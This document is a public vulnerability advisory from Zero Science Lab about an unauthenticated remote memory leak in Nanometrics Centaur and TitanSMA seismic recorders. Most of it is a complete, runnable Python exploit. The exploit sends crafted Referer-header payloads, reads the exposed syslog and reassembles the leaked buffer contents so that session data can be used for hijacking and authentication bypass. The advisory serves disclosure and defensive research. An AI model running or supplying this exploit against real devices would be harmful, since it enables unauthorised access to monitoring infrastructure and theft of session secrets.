Title: Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit Advisory ID: ZSL-2020-5562 Type: Local/Remote Impact: System Access, DoS, Exposure of System Information, Exposure of Sensitive Information Risk: (5/5) Release Date: 15.02.2020 Summary The Centaur digital recorder is a portable geophysical sensing acquisition system that consists of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. Its ease of use simplifies high performance geophysical sensing deployments in both remote and networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for infrasound and similar geophysical sensor recording applications requiring sample rates up to 5000 sps. The TitanSMA is a strong motion accelerograph designed for high precision observational and structural engineering applications, where scientists and engineers require exceptional dynamic range over a wide frequency band. Description An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent packet) which can be combined to leak sensitive data which can be used to perform session hijacking and authentication bypass scenarios. Vendor Nanometrics Inc. - https://www.nanometrics.ca Affected Version Centaur <= 4.3.23 TitanSMA <= 4.2.20 Tested On Jetty 9.4.z-SNAPSHOT Vendor Status [10.02.2020] Vulnerabilities discovered. [10.02.2020] Vendor contacted. [14.02.2020] No response from the vendor. [15.02.2020] Public security advisory released. PoC #!/usr/bin/env python3 # # Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit # # # Vendor: Nanometrics Inc. # Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma # Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder # # Affected versions: # Centaur <= 4.3.23 # TitanSMA <= 4.2.20 # # Summary: # The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists # of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. # Its ease of use simplifies high performance geophysical sensing deplayments in both remote and # networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for # infrasound and similar geophysical sensor recording applications requiring sample rates up to # 5000 sps. # # Summary: # The TitanSMA is a strong motion accelerograph designed for high precision observational and # structural engineering applications, where scientists and engineers require exceptional dynamic # range over a wide frequency band. # # Description: # An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect # critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) # suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. # As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. # Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP # packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system # logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent # packet) which can be combined to leak sensitive data which can be used to perform session hijacking # and authentication bypass scenarios. # # Tested on: # Jetty 9.4.z-SNAPSHOT # # Vulnerability discovered by: # byteGoblin @ zeroscience.mk # # # Advisory ID: ZSL-2020-5562 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php # # Related CVE: CVE-2015-2080 # Related CWE: CWE-532, CWE-538 # # 10.02.2020 # import requests import re import sys class Goblin: def __init__(self): self.host = None self.page = "/zsl" self.syslog = "/logs/syslog" self.buffer_pad = "A" * 70 self.buffer = None self.payload = "\xFF" self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results self.body = {} self.headers = None self.syslog_data = {} self.last_line = None self.before_last_line = True def banner(self): goblin = """ NN NkllON 0;;::k000XN KxllokN 0;,:,;;;;:ldK Kdccc::oK Nx,';codddl:::dkdc:c:;lON klc:clloooooooc,.':lc;'lX x;:ooololccllc:,:ll:,:xX Kd:cllc'..';:ccclc,.x _ . ___ _ . NOoc::c:,'';:ccllc::''k \ ___ , . _/_ ___ .' \ __. \ ___ | ` , __ Nklc:clccc;.;odoollc:',xN |/ \ | ` | .' ` | .' \ |/ \ | | |' `. 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / | Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/ Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// XxclkXk;'::,,,''';:::;'''...'',:o0 Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product Xx:,'':xk:..,''lK Y k;';;';xX XOkkko'.....'O d.';;,,:xN 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ XOkkkkkON """ print(goblin) def generate_payload(self, amount_of_bytes): self.payload += "\x00" * amount_of_bytes self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload} def read_syslog(self, initial=False): # Read syslog remotely and filter out 'HeapByteBuffer' messages. # 'initial' is used to make a 'snapshot' of the state before we send payloads... # That way we can filter on what we've just sent. print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog)) buffer = "" r = requests.get(self.host + self.syslog) if r.status_code == 200: print("[!] - We got syslog, it is: {} bytes".format(len(r.content))) split = r.text.split("\n") for line in split: if "HeapByteBuffer" in line: if initial: self.last_line = line else: if line == self.last_line: self.before_last_line = False if not self.before_last_line: buffer_addr = re.search("\@\w+", line).group(0).strip("@") try: leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>") buffer += leak except Exception as e: print(e) if initial: return self.last_line self.buffer = buffer else: # we can't access syslog? print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...") print("[!!!] - The status code we got was: {}".format(r.status_code)) exit(-1) def show_output(self): # we need to translate '\r\n' into actual newlines if self.buffer is not None and self.buffer is not "": self.buffer = self.buffer.replace("\\n", "\n") self.buffer = self.buffer.replace("\\r", "\r") self.buffer = self.buffer.replace("%2f", "/") print("[*] BUFFER LENGTH: {}".format(len(self.buffer))) print("=" * 50) print("[*] THIS IS THE LOOT") print("=" * 50) for num, x in enumerate(self.buffer.split("\n")): print("{}.\t| \t{}".format(num, x)) def send_payload(self, amount): print("[!] - Sending payloads to target: {}{}".format(self.host, self.page)) if amount > self.payloads_to_send or amount < 0: amount = self.payloads_to_send for num, x in enumerate(range(0, amount)): if num % 10 == 0: print("[!] - [{}/{}] payloads sent...".format(num, amount)) try: self.generate_payload(17) r = requests.post(self.host + self.page, data=self.body, headers=self.headers) except Exception as e: print(e) print("[!] - [{}/{}] payloads sent...".format(amount, amount)) def parse_sys_args(self): if len(sys.argv) >= 2: self.host = sys.argv[1] if not "http" in self.host: self.host = "http://{}".format(self.host) if len(sys.argv) == 3: # amount of packets to send self.payloads_to_send = sys.argv[2] else: self.print_help() def print_help(self): print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0])) print("Example: centaur3.py 123.456.789.0:8080 200") print("\tThis will send 200 payloads to the aforementioned host") print("\tThe [port] and [amount of payloads] are optional") exit(-1) def main(self): self.parse_sys_args() self.banner() ll = self.read_syslog(initial=True) self.send_payload(70) self.read_syslog() self.show_output() if __name__ == '__main__': Goblin().main() Credits Vulnerability discovered by byteGoblin - <bytegoblin@zeroscience.mk> References [1] https://nvd.nist.gov/vuln/detail/CVE-2015-2080 [2] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php Changelog [15.02.2020] - Initial release Contact Zero Science Lab Web: http://www.zeroscience.mk e-mail: lab@zeroscience.mk